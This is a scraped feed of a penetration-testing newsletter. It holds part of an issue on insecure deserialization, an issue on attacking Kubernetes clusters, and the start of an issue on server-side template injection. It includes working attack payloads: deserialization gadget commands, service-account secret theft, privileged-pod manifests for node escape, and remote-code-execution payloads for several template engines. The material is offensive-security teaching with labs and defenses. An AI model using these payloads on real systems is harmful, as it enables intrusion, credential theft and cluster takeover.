Serialization bugs aren&apos;t just legacy tech. React Server Components got hit with [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182), a CVSS 10.0 prototype pollution bug in the Flight Protocol.

**Attack vector:**

```javascript
{
  &quot;__proto__&quot;: {
    &quot;isAdmin&quot;: true,
    &quot;shell&quot;: &quot;require(&apos;child_process&apos;).exec(&apos;whoami&apos;)&quot;
  }
}
```

User input flows into Flight serialization. Malicious object pollutes Object.prototype. Downstream code executes contaminated property. RCE in Node.js context. [Actively exploited in the wild](https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html).

**Fix:** Update to React &gt;= 19.1.0 or Next.js &gt;= 15.3.2. Check [Issue #24](/newsletter/issue-24) for prototype pollution fundamentals.

Serialization bugs exist everywhere. Legacy Java apps. Cutting-edge JavaScript frameworks. Everywhere.

## 🔷 .NET Deserialization

Microsoft officially says [BinaryFormatter is dangerous and you shouldn&apos;t use it](https://learn.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide). They gave up trying to secure it.

**[ysoserial.net](https://github.com/pwntester/ysoserial.net)** generates .NET payloads:

```powershell
# BinaryFormatter
ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c &quot;whoami&quot;

# JSON.NET TypeNameHandling
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c &quot;calc&quot;
```

**JSON.NET with TypeNameHandling.All** includes type info that enables RCE:

```json
{
  &quot;$type&quot;: &quot;System.Windows.Data.ObjectDataProvider, PresentationFramework&quot;,
  &quot;MethodName&quot;: &quot;Start&quot;,
  &quot;ObjectInstance&quot;: { &quot;$type&quot;: &quot;System.Diagnostics.Process, System&quot; }
}
```

Microsoft SharePoint gets owned via .NET deserialization in the ViewState parameter. Unauthenticated RCE. Core .NET Framework components (DataSet, DataTable) have had multiple bugs.

## 🛠️ Tools for Deserialization Testing

**[ysoserial](https://github.com/frohoff/ysoserial)** - Your go-to for Java deserialization. Generates payloads for dozens of Java libraries.

```bash
# Download and use
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
java -jar ysoserial-all.jar [payload] [command]
```

**[ysoserial.net](https://github.com/pwntester/ysoserial.net)** - The .NET equivalent. Supports BinaryFormatter, NetDataContractSerializer, JSON.NET, and more.

```powershell
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c &quot;calc&quot; -o base64
```

**[PHPGGC](https://github.com/ambionics/phpggc)** - Automates POP chain exploitation for PHP frameworks. Laravel, Symfony, WordPress, you name it.

```bash
./phpggc Laravel/RCE1 system &apos;id&apos; | base64
```

**[marshalsec](https://github.com/mbechler/marshalsec)** - Research toolkit for Java unmarshalling bugs. JNDI injection, RMI exploitation, gadget chain research.

**Burp Suite Extensions:**
- **Java Deserialization Scanner**: Automates detection of Java deserialization bugs
- **Freddy**: Active and passive scanner for deserialization across multiple languages

## 🧪 Labs

**[PortSwigger Web Security Academy - Insecure Deserialization](https://portswigger.net/web-security/deserialization)**: Comprehensive labs covering PHP object manipulation, Java gadget chains, PHPGGC exploitation, and custom chain development.

**HackTheBox Machines:**
- **[Arkham](https://www.hackthebox.com/machines/arkham)** (Medium): Java deserialization via ViewState
- **[Tenet](https://www.hackthebox.com/machines/tenet)** (Medium): PHP unserialize() exploitation
- **[JSON](https://www.hackthebox.com/machines/json)** (Medium): .NET JSON.NET TypeNameHandling
- **[Fatty](https://www.hackthebox.com/machines/fatty)** (Insane): Custom Java gadget chains

## 🔒 Defense and Mitigation

**Golden rule: Never deserialize untrusted data.**

You control the serialization source and transmission channel? Safe. Users can influence the serialized data? Vulnerable.

**Use safe serialization formats:**

Replace binary serialization with safer alternatives:

```python
# UNSAFE
import pickle
data = pickle.loads(user_input)

# SAFE
import json
data = json.loads(user_input)
```

JSON, XML, and Protocol Buffers can&apos;t execute arbitrary code during deserialization. Use them.

**Language-specific mitigations:**

**Java**: Use `ObjectInputFilter` (JDK 9+) to whitelist allowed classes:
```java
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(&quot;com.example.SafeClass;!*&quot;);
ois.setObjectInputFilter(filter);
```

**Python**: Use `json` instead of `pickle`. If pickle is required, implement class validation with `RestrictedUnpickler`.

**.NET**: Avoid BinaryFormatter entirely. Use `System.Text.Json` or MessagePack.

**PHP**: Use `allowed_classes` option:
```php
// Only allow specific classes
$data = unserialize($input, [&apos;allowed_classes&apos; =&gt; [&apos;User&apos;, &apos;Session&apos;]]);

// Disallow all classes (primitives only)
$data = unserialize($input, [&apos;allowed_classes&apos; =&gt; false]);
```

**Monitor and detect:**

Log all deserialization operations. Alert on known malicious class names (`CommonsCollections`, `ObjectDataProvider`). Implement rate limiting on deserialization endpoints.

## 🎯 Key Takeaways

Deserialization bugs give you direct RCE. No chaining. No privilege escalation. Find it, exploit it, you&apos;ve got code execution.

Every major language is vulnerable. Java (ysoserial gadget chains), Python (pickle is inherently unsafe), PHP (POP chains), .NET (BinaryFormatter deprecated), React (CVSS 10.0 prototype pollution). All exploitable.

Detection is straightforward. Base64 blobs in cookies or POST bodies. Specific signatures: `rO0` (Java), `gASV` (Python pickle), `O:4:&quot;User&quot;` (PHP), `AAEAAAD` (.NET). Once you know the patterns, exploitation is trivial.

Tools automate everything. [ysoserial](https://github.com/frohoff/ysoserial), [ysoserial.net](https://github.com/pwntester/ysoserial.net), [PHPGGC](https://github.com/ambionics/phpggc). Most attacks don&apos;t need custom gadget chains.

---

That&apos;s it for this week.

The challenge is recognition. Serialized data is buried in cookies, POST bodies, binary protocols. Learn those signatures. Master the tools. Practice on [PortSwigger labs](https://portswigger.net/web-security/deserialization) and HackTheBox machines.

Golden rule: never deserialize untrusted data.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Kubernetes for Pentesters: Breaking Orchestrated Infrastructure from Zero</title><link>https://www.kayssel.com/newsletter/issue-33</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-33</guid><description>From your first pod compromise to full cluster takeover: a practical introduction to Kubernetes security testing</description><pubDate>Sun, 18 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ve been wanting to write about Kubernetes security for a while now. A few months ago I covered [Docker container escapes](https://www.kayssel.com/newsletter/issue-23/), and Kubernetes is the natural next step when you start thinking about production container environments.

I started a [Docker Security series](https://www.kayssel.com/series/docker-security/) on the blog, but honestly, I don&apos;t know when I&apos;ll get around to finishing it. Life gets in the way, other projects take priority, and before you know it, months have passed. So instead of waiting indefinitely to write a comprehensive blog series, I&apos;m giving you the essentials in this newsletter.

If you&apos;ve broken out of Docker containers and wondered what happens in production environments where Kubernetes manages hundreds of pods across multiple nodes, this is your crash course.

Docker escapes are about breaking out of a single container to reach the host. Kubernetes attacks are about compromising one pod to gain access to the entire cluster infrastructure. Other pods, secrets, API server credentials, persistent volumes, and ultimately the underlying nodes. The attack surface is massive, and the barrier to entry is lower than you&apos;d think.

This newsletter covers Kubernetes fundamentals for pentesters, detecting when you&apos;re in a pod, service account tokens (automatic credentials in every pod), RBAC misconfigurations and privilege escalation paths, and essential tools and labs to practice these attacks.

Let&apos;s break some clusters 👇

## ☸️ Kubernetes 101 for Pentesters

Before we exploit anything, let&apos;s understand what Kubernetes is and why it exists.

Kubernetes (K8s) is a container orchestration platform. It manages containers across multiple machines, handles networking between them, distributes workloads, and restarts failed containers automatically. Docker runs one container on one machine. Kubernetes runs thousands of containers across hundreds of machines with automatic scaling, load balancing, and self-healing.

For pentesters, this means credentials are everywhere (every pod gets automatic API access via service account tokens), networking is shared (pods can communicate across the cluster by default), secrets are centralized (Kubernetes stores sensitive data in a single location), and privilege escalation is common (RBAC misconfigurations grant excessive permissions).

Breaking one pod can give you access to the entire cluster.

### Kubernetes Architecture (Attack Surface Map)

Kubernetes clusters have two types of machines.

**Control Plane nodes** manage the cluster. The **API Server** is the central control point for everything. Every kubectl command, every pod creation, every secret access goes through the API server. This is your primary target. **etcd** is the distributed key-value database storing all cluster data including secrets, configurations, and state. Compromising etcd means full cluster compromise. The Scheduler decides which node runs which pod, and the Controller Manager ensures desired state matches actual state.

**Worker Nodes** run your actual workloads (pods). The **kubelet** is an agent on each node that manages containers and exposes an API, often unauthenticated. Direct kubelet access means node compromise. kube-proxy handles networking and load balancing. The Container Runtime (Docker, containerd, or CRI-O) runs the actual containers.

From an attacker perspective, the path looks like this:

```
Pod Compromise → Service Account Token → API Server Access → RBAC Enumeration →
Privilege Escalation → Create Privileged Pod → Node Access → etcd Access →
Full Cluster Compromise
```

The path from &quot;I have RCE in a web app running in a pod&quot; to &quot;I control the entire Kubernetes cluster&quot; is shorter than you&apos;d think.

### Key Kubernetes Concepts

**Pod** is the smallest deployable unit. It can contain one or more containers. Think of it as a wrapper around your Docker container(s).

**Namespace** provides logical isolation within a cluster. Resources in `namespace-a` are separated from `namespace-b`, but this is NOT a security boundary. RBAC controls access, not namespaces.

**Service** exposes pods to network traffic (ClusterIP, NodePort, LoadBalancer) and handles internal DNS and load balancing.

**Secret** is a Kubernetes object for storing sensitive data like passwords, tokens, and keys. Secrets are stored in etcd and are base64 encoded (not encrypted) by default unless you enable encryption at rest.

**ConfigMap** is similar to Secrets but for non-sensitive configuration. It often contains database hostnames, API endpoints, etc.

**RBAC (Role-Based Access Control)** defines who can do what in the cluster. This is where most privilege escalation happens.

**Service Account** provides identity for pods. Every pod automatically gets a service account token mounted at `/var/run/secrets/kubernetes.io/serviceaccount/`. This is your credential for talking to the API server.

In Kubernetes, the primary attack vector shifts from kernel exploitation to API abuse and RBAC privilege escalation. Privileged containers still work, but you need RBAC permissions to create them. Host PID namespace access requires `hostPID: true` in the pod spec. Kernel exploits like Dirty Pipe still work, but you need node access first.

## 🎯 Why Kubernetes Security Matters

When you compromise a container in a traditional environment, you&apos;re limited to that container and potentially the host it&apos;s running on. When you compromise a pod in Kubernetes, the situation is different.

Every pod gets a service account token by default. This token can often list other pods in the namespace, read secrets, access ConfigMaps, and create new pods if RBAC is misconfigured. Kubernetes networking is flat by default. Unless Network Policies are configured (and they usually aren&apos;t), you can reach any other pod in any namespace, access internal services like databases and message queues, and pivot to other applications running in the cluster.

Kubernetes stores secrets centrally in etcd. If your service account has `secrets:get` permission, you can access database passwords, API keys for third-party services, cloud provider credentials (AWS, GCP, Azure), and SSH keys, certificates, and tokens.

Kubernetes nodes run on cloud instances (AWS EC2, GCP Compute Engine, Azure VMs). If you can reach the node or exploit the kubelet API, you can perform SSRF to the cloud metadata service at `169.254.169.254`, steal cloud IAM credentials, and pivot to the entire cloud account.

Unlike ephemeral containers, Kubernetes makes persistence easy. You can create a new pod with a backdoor, modify existing deployments, add malicious init containers, or deploy DaemonSets that run on every node.

The common pattern in real-world incidents is Kubernetes misconfigurations (unauthenticated APIs, overly permissive RBAC, exposed secrets) leading to full infrastructure compromise. The [Tesla cryptomining incident](https://cyberscoop.com/tesla-cryptomining-redlock-cloud-breach/), for example, started with an unauthenticated Kubernetes dashboard and ended with cloud credential theft and cryptominers deployed across the entire cluster.

## 🔍 Detecting You&apos;re in a Kubernetes Pod

First step is figuring out if you&apos;re in a Kubernetes-managed container versus a standalone Docker container.

Every Kubernetes pod automatically mounts service account credentials at `/var/run/secrets/kubernetes.io/serviceaccount/`. If this directory exists, you&apos;re in a Kubernetes pod.

```bash
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
```

The directory contains three files. `token` is the JWT token for authenticating to the API server. `ca.crt` is the certificate authority for verifying API server TLS. `namespace` contains the namespace this pod is running in.

Kubernetes automatically injects environment variables for service discovery. The presence of `KUBERNETES_SERVICE_HOST` confirms you&apos;re in a pod.

```bash
env | grep KUBERNETES
```

You&apos;ll see variables like `KUBERNETES_SERVICE_HOST=10.96.0.1` and `KUBERNETES_SERVICE_PORT=443`.

You can also check the cgroup path for `kubepods`:

```bash
cat /proc/1/cgroup | grep kubepods
```

Kubernetes pod hostnames follow a predictable pattern like `webapp-deployment-7d8f9c4b5-xk9pl` with the format `{deployment-name}-{replicaset-hash}-{pod-hash}`.

Once you&apos;ve confirmed you&apos;re in a Kubernetes pod, gather initial information. Check your namespace, pod hostname, environment variables (they may leak internal service names), whether kubectl is installed, and test network connectivity to the API server.

```bash
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
hostname
env
which kubectl
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/version
```

## 🔑 Service Account Tokens Are Your First Credential

Every Kubernetes pod gets a service account token automatically mounted at `/var/run/secrets/kubernetes.io/serviceaccount/token`. This JWT token is your credential for talking to the API server.

By default, pods use the `default` service account in their namespace. This account should have minimal permissions, but developers often grant it excessive access for convenience.

### Querying the API Server

Setup your environment variables first:

```bash
APISERVER=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
```

Test API access by listing pods:

```bash
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/pods
```

### Enumerating Permissions

The first thing you want to know is what this service account can do. If kubectl is installed in the pod, you can use it directly:

```bash
kubectl auth can-i --list
kubectl auth can-i create pods
kubectl auth can-i get secrets --all-namespaces
```

Without kubectl, you need to try different API endpoints with curl. Try listing secrets in your namespace, checking for cluster-wide pod access, or attempting to create resources.

```bash
# List secrets
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/secrets

# Check cluster-wide access
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/pods
```

High-value permissions to look for include `secrets:get/list` for reading passwords, API keys, and cloud credentials. `pods:create` allows you to create new pods, which is a direct privilege escalation path. `pods:exec` lets you execute commands in other pods. `*:*` means full cluster admin access.

### Stealing Secrets

If you have `secrets:list`, secrets are base64-encoded but not encrypted. You can retrieve them via the API and decode them locally.

```bash
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/secrets/database-credentials | jq &apos;.data&apos;
```

Decode with `echo &quot;YWRtaW4=&quot; | base64 -d` to reveal the plaintext value.

According to the [NSA/CISA Kubernetes Hardening Guide](https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF), service accounts are a common source of over-privileged access. In practice, the `default` service account often has cluster-wide read access, and legacy applications may have full admin tokens.

## 🔐 RBAC and Privilege Escalation

RBAC (Role-Based Access Control) defines who can do what in Kubernetes. Misconfigurations here are the primary path to privilege escalation.

**Role** defines permissions scoped to a specific namespace. **ClusterRole** defines permissions scoped to the entire cluster. **RoleBinding** assigns a Role to users or service accounts within a namespace. **ClusterRoleBinding** assigns a ClusterRole across all namespaces.

### Common Misconfigurations

The most dangerous misconfiguration is granting `cluster-admin` to the `default` service account. This gives full cluster access from any pod in that namespace.

Wildcard permissions are equally problematic. Rules with `apiGroups: [&quot;*&quot;]`, `resources: [&quot;*&quot;]`, and `verbs: [&quot;*&quot;]` grant unrestricted admin access.

The most interesting misconfiguration for attackers is having `pods:create` permission. If you have this, you can create a privileged pod with host access.

```bash
cat &lt;&lt;EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: privesc-pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: privesc
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
    command: [&quot;/bin/bash&quot;, &quot;-c&quot;, &quot;sleep 3600&quot;]
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
```

Then execute into it and chroot to gain root access on the underlying node:

```bash
kubectl exec -it privesc-pod -- /bin/bash
chroot /host
```

ClusterRoleBindings that grant `secrets:get` across all namespaces give you access to every credential in the cluster.

### Enumeration

Check what permissions you have:

```bash
kubectl auth can-i --list
kubectl auth can-i create pods
kubectl auth can-i get secrets --all-namespaces
```

List roles and bindings to understand the RBAC structure:

```bash
kubectl get roles,rolebindings
kubectl get clusterroles,clusterrolebindings
```

According to the [Microsoft Kubernetes Threat Matrix](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/), the typical escalation path follows this sequence: RCE in pod, service account enumeration, steal secrets (if you have `secrets:get`), create privileged pod (if you have `pods:create`), gain node access, and finally achieve cluster admin.

## 🛠️ Essential Tools for Kubernetes Pentesting

### kubectl

[kubectl](https://kubernetes.io/docs/reference/kubectl/) is the official Kubernetes CLI. If it&apos;s already installed in the pod, you&apos;re in luck. It will use your service account token automatically.

```bash
kubectl auth can-i --list
kubectl get pods
kubectl get secrets
```

You can create a privileged pod for node access with a long one-liner using `--overrides`:

```bash
kubectl run privesc --image=ubuntu --restart=Never \
  --overrides=&apos;{&quot;spec&quot;:{&quot;hostPID&quot;:true,&quot;hostNetwork&quot;:true,&quot;containers&quot;:[{&quot;name&quot;:&quot;privesc&quot;,&quot;image&quot;:&quot;ubuntu&quot;,&quot;command&quot;:[&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;sleep 3600&quot;],&quot;securityContext&quot;:{&quot;privileged&quot;:true},&quot;volumeMounts&quot;:[{&quot;name&quot;:&quot;host&quot;,&quot;mountPath&quot;:&quot;/host&quot;}]}],&quot;volumes&quot;:[{&quot;name&quot;:&quot;host&quot;,&quot;hostPath&quot;:{&quot;path&quot;:&quot;/&quot;,&quot;type&quot;:&quot;Directory&quot;}}]}}&apos;
```

If kubectl isn&apos;t installed, you can download the static binary from the official Kubernetes release page.

### kubeletctl

[kubeletctl](https://github.com/cyberark/kubeletctl) by CyberArk exploits the kubelet API. The kubelet runs on each worker node (port 10250). If it&apos;s unauthenticated or weakly authenticated, you can list pods running on the node and execute commands in any pod on that node.

```bash
# Scan for kubelet API
./kubeletctl_linux_amd64 scan --cidr 10.0.0.0/24

# Execute command in a pod
./kubeletctl_linux_amd64 exec -s 10.0.1.5 -p nginx-pod -c nginx -- /bin/bash
```

### kube-hunter

[kube-hunter](https://github.com/aquasecurity/kube-hunter) by Aqua Security performs automated vulnerability scanning. It looks for open kubelet APIs, exposed dashboards, privilege escalation paths, and insecure configurations.

```bash
docker run -it --rm --network host aquasec/kube-hunter --pod
```

### peirates

[peirates](https://github.com/inguardians/peirates) is an interactive Kubernetes pentesting framework with service account enumeration, RBAC escalation, and secret stealing capabilities.

### kubectl-who-can

[kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) enumerates RBAC permissions:

```bash
kubectl who-can create pods
kubectl who-can get secrets --all-namespaces
```

## 🎓 Hands-On Labs and Practice

The best place to start is [Kubernetes Goat](https://github.com/madhuakula/kubernetes-goat) by OWASP. It provides 20+ vulnerable scenarios covering RBAC, secrets, container escapes, and privilege escalation.

```bash
git clone https://github.com/madhuakula/kubernetes-goat
cd kubernetes-goat
bash setup-kubernetes-goat.sh
```

[KubeHound](https://github.com/DataDog/KubeHound) by DataDog is an attack path mapping tool similar to BloodHound but for Kubernetes. It automatically calculates attack paths between assets in a cluster using graph theory.

For CTF-style practice, HackTheBox has confirmed Kubernetes machines. [SteamCloud](https://www.hackthebox.com/machines/steamcloud) is an easy box with kubelet exploitation and service account token abuse. [Unobtainium](https://www.hackthebox.com/machines/unobtainium) is a hard box featuring Kubernetes RBAC exploitation and pod escape techniques.

Free playgrounds include [Killercoda](https://killercoda.com/) with interactive K8s labs in your browser, and [Play with Kubernetes](https://labs.play-with-k8s.com/) which provides a free 4-hour K8s cluster.

## 🎯 Wrapping Up

This newsletter covered the fundamentals of Kubernetes security from an offensive perspective. Service accounts give you automatic credentials in every pod. RBAC misconfigurations are the primary privilege escalation path. The kubelet API is often unauthenticated. And one compromised pod can lead to full cluster compromise.

What you should practice: detecting when you&apos;re in a K8s pod by checking `/var/run/secrets/kubernetes.io/serviceaccount/`, enumerating permissions with `kubectl auth can-i --list`, stealing secrets if you have `secrets:get`, creating privileged pods if you have `pods:create`, and exploiting unauthenticated kubelet APIs.

Start with Kubernetes Goat, read the NSA/CISA Kubernetes Hardening Guide, and try a HackTheBox machine with Kubernetes.

---

## 💬 New: Comments Section!

Quick announcement: I&apos;ve just added a **comments section** to all blog posts and newsletters using Giscus. You can now drop your thoughts, questions, or feedback directly below each post.

Found a bug in the site? Have a suggestion? Want to discuss Kubernetes attack paths? The comments are now live. Try it out below 👇

---

See you in the next issue 👋</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Server-Side Template Injection (SSTI): Breaking Out of Templates</title><link>https://www.kayssel.com/newsletter/issue-32</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-32</guid><description>How attackers exploit template engines to achieve remote code execution by injecting malicious payloads into server-side templates</description><pubDate>Sun, 11 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Server-Side Template Injection (SSTI) is one of those vulnerabilities that goes straight from user input to remote code execution. When user input gets embedded directly into a template and processed by the template engine, attackers can break out of the intended context and execute arbitrary code. Unlike XSS where you attack the browser, SSTI attacks the server itself.

Template engines are everywhere. Flask uses Jinja2. Django has its own. Ruby on Rails uses ERB. Express.js apps often use Pug or Handlebars. PHP applications might use Twig or Smarty. Java applications use Freemarker or Velocity. All of these have been exploited via SSTI.

In this issue, we&apos;ll cover:
- How template engines work and why they&apos;re vulnerable
- Identifying template engines from error messages
- Detection techniques for different engines
- Exploitation paths from detection to RCE
- Engine-specific payloads (Jinja2, Twig, Freemarker, etc.)
- Sandbox escape techniques
- Real-world CVEs from 2024
- Tools and labs for practice

If you&apos;re pentesting web applications, understanding SSTI is critical. It&apos;s an often-overlooked vulnerability that can lead straight to remote code execution.

Let&apos;s break some templates 👇

## 🎯 Understanding Template Engines

Template engines separate presentation logic from application code. Instead of mixing HTML with backend code, developers write templates with placeholders that get replaced at runtime.

**Example template (Jinja2):**

```html
&lt;h1&gt;Welcome, {{username}}!&lt;/h1&gt;
&lt;p&gt;Your balance is ${{balance}}&lt;/p&gt;
```

**Rendered output:**

```html
&lt;h1&gt;Welcome, Alice!&lt;/h1&gt;
&lt;p&gt;Your balance is $1,234&lt;/p&gt;
```

The template engine evaluates `{{username}}` and `{{balance}}`, replacing them with actual values.

### Why Template Engines Are Dangerous

Template engines are designed to execute code. That&apos;s their job. They support:
- Variable interpolation: `{{variable}}`
- Expressions: `{{7*7}}` or `{{user.name.upper()}}`
- Filters: `{{text|escape}}` or `{{date|format(&apos;Y-m-d&apos;)}}`
- Control structures: `{% if admin %}...{% endif %}`
- Object access: `{{config.SECRET_KEY}}`

When user input flows into a template without proper sanitization, attackers can inject template directives. Since the engine executes these directives server-side, you get remote code execution.

### Safe vs. Unsafe Template Usage

**Safe (data-level injection):**

```python
# User input goes into template data, not template itself
template = &quot;Hello, {{name}}!&quot;
render(template, {&apos;name&apos;: user_input})
```

Even if `user_input` is `{{7*7}}`, it renders as literal text: &quot;Hello, {{7*7}}!&quot;

**Unsafe (template-level injection):**

```python
# User input becomes part of the template
template = &quot;Hello, &quot; + user_input + &quot;!&quot;
render(template, {})
```

If `user_input` is `{{7*7}}`, the template becomes `Hello, {{7*7}}!` and evaluates to &quot;Hello, 49!&quot;

The vulnerability occurs when developers dynamically construct templates from user input.

## 🔍 Detecting SSTI

### Initial Detection

Test with basic mathematical expressions:

```
{{7*7}}
${7*7}
&lt;%= 7*7 %&gt;
${{7*7}}
#{7*7}
```

If any of these render as `49`, you&apos;ve found SSTI. Different engines use different syntax:

- **`{{...}}`**: Jinja2, Twig, Handlebars, Mustache, Pug
- **`${...}`**: Freemarker, Velocity, Thymeleaf
- **`&lt;%= ... %&gt;`**: ERB (Ruby), EJS (Node.js)
- **`#{...}`**: Pug (alternate syntax)

### Decision Tree for Engine Identification

Once you confirm SSTI, identify the template engine:

**Step 1: Try basic syntax variations**

```
{{7*&apos;7&apos;}}  → &apos;7777777&apos; = Jinja2 or Twig
{{7*&apos;7&apos;}}  → 49 = Mako
${7*7}     → 49 = Freemarker or Velocity
&lt;%= 7*7 %&gt; → 49 = ERB or EJS
```

**Step 2: Distinguish between similar engines**

For Jinja2 vs. Twig:

```
{{7*&apos;7&apos;}}         → &apos;7777777&apos; (both)
{{&apos;7&apos;*7}}         → &apos;7777777&apos; (Jinja2), error (Twig)
```

For Freemarker vs. Velocity:

```
${7*7}            → 49 (both)
${7*&apos;7&apos;}          → error (Freemarker), 49 (Velocity)
```

**Step 3: Check error messages**

Trigger an error intentionally to leak the engine name:

```
{{undefined_variable}}
${nonexistent.function()}
&lt;%= raise &apos;test&apos; %&gt;
```

Error messages often reveal:
- Template engine name and version
- File paths (useful for later exploitation)
- Framework details (Flask, Django, Rails, etc.)

## 🧨 Exploitation by Template Engine

### Jinja2 (Python / Flask)

Jinja2 is used by Flask and other Python web frameworks. It has a sandbox, but it can be escaped.

**Basic information disclosure:**

```python
{{config}}
{{config.items()}}
{{self.__dict__}}
```

This leaks Flask configuration, including `SECRET_KEY`, database credentials, and other sensitive data.

**Sandbox escape to RCE:**

The goal is to access Python&apos;s `os` module to execute commands. Jinja2&apos;s sandbox blocks direct access, so we exploit built-in context objects.

**Reliable payloads (from HackTricks):**

```python
# Using cycler object
{{cycler.__init__.__globals__.os.popen(&apos;id&apos;).read()}}

# Using joiner object
{{joiner.__init__.__globals__.os.popen(&apos;id&apos;).read()}}

# Using namespace object
{{namespace.__init__.__globals__.os.popen(&apos;id&apos;).read()}}
```

These payloads exploit Jinja2 context objects (`cycler`, `joiner`, `namespace`) that have accessible `__init__` methods exposing `__globals__`, allowing direct access to the `os` module.

**Filter bypass:**

If keywords like `class` or `import` are filtered:

```python
# Use string concatenation
{{&apos;cl&apos;+&apos;ass&apos;}}

# Use attribute access
{{request[&apos;__cl&apos;+&apos;ass__&apos;]}}

# Hex encoding
{{&quot;\x5f\x5fclass\x5f\x5f&quot;}}
```

### Twig (PHP / Symfony)

Twig is the default template engine for Symfony applications.

**Basic detection:**

```php
{{7*7}}  → 49
{{7*&apos;7&apos;}} → 49 (Twig does type coercion)
```

**Information disclosure:**

```php
{{_self}}
{{_self.env}}
{{dump(app)}}
```

**RCE via filter registration:**

```php
{{_self.env.registerUndefinedFilterCallback(&quot;system&quot;)}}{{_self.env.getFilter(&quot;id&quot;)}}
```

This registers `system` as a catch-all for undefined filters, then invokes it with the `id` command.

**Using array filter (shorter):**

```php
{{[&apos;id&apos;]|filter(&apos;system&apos;)}}
{{[&apos;cat /etc/passwd&apos;]|filter(&apos;system&apos;)}}
```

This technique chains array operations with system command execution.

### Freemarker (Java)

Freemarker is common in Java applications, especially with Spring Framework.

**Basic detection:**

```java
${7*7}  → 49
```

**RCE via `Execute` class:**

```java
&lt;#assign ex=&quot;freemarker.template.utility.Execute&quot;?new()&gt;
${ex(&quot;id&quot;)}
```

This creates a new instance of the `Execute` class and runs the `id` command.

**Shorter alternative:**

```java
${&quot;freemarker.template.utility.Execute&quot;?new()(&quot;whoami&quot;)}
```

**Reading files:**

```java
&lt;#assign file=&quot;freemarker.template.utility.FileReader&quot;?new()&gt;
${file(&quot;/etc/passwd&quot;)}
```

### Velocity (Java)

Used in older Java applications and Apache projects.

**Basic detection:**

```java
${7*7}  → 49
```

**RCE via reflection:**

```java
#set($x=&apos;&apos;)
#set($rt = $x.class.forName(&apos;java.lang.Runtime&apos;))
#set($ex=$rt.getRuntime().exec(&apos;id&apos;))
$ex.waitFor()
```

**With output capture:**

```java
#set($x=&apos;&apos;)
#set($rt = $x.class.forName(&apos;java.lang.Runtime&apos;))
#set($chr = $x.class.forName(&apos;java.lang.Character&apos;))
#set($str = $x.class.forName(&apos;java.lang.String&apos;))
#set($ex=$rt.getRuntime().exec(&apos;whoami&apos;))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```

### ERB (Ruby / Rails)

ERB (Embedded Ruby) is the default template engine for Ruby on Rails.

**Basic detection:**

```ruby
&lt;%= 7*7 %&gt;  → 49
```

**RCE:**

```ruby
&lt;%= system(&apos;id&apos;) %&gt;
&lt;%= `whoami` %&gt;
&lt;%= IO.popen(&apos;id&apos;).readlines() %&gt;
```

**Reading files:**

```ruby
&lt;%= File.open(&apos;/etc/passwd&apos;).read %&gt;
```

## 🛠️ Tools of the Trade

**[tplmap](https://github.com/epinna/tplmap)**: The original and most comprehensive SSTI exploitation tool. Supports 15+ template engines including Jinja2, Twig, Freemarker, Velocity, ERB, and more. Automates detection, identification, and exploitation. Written in Python 2.7.

```bash
# Install
git clone https://github.com/epinna/tplmap.git
cd tplmap

# Basic usage
python2 tplmap.py -u &apos;http://target.com/page?name=*&apos;

# With POST data
python2 tplmap.py -u &apos;http://target.com/page&apos; -d &apos;name=*&amp;email=test@test.com&apos;

# Specify injection point
python2 tplmap.py -u &apos;http://target.com/page?name=*&apos; --os-cmd &apos;id&apos;
```

**[SSTImap](https://github.com/vladko312/SSTImap)**: Modern Python 3 alternative to tplmap with interactive interface. Automatic SSTI detection and exploitation with better maintainability.

```bash
# Install
git clone https://github.com/vladko312/SSTImap.git
cd SSTImap

# Basic usage
python3 sstimap.py -u &apos;http://target.com/page?name=*&apos;

# Interactive mode
python3 sstimap.py -i -u &apos;http://target.com/page?name=*&apos;
```

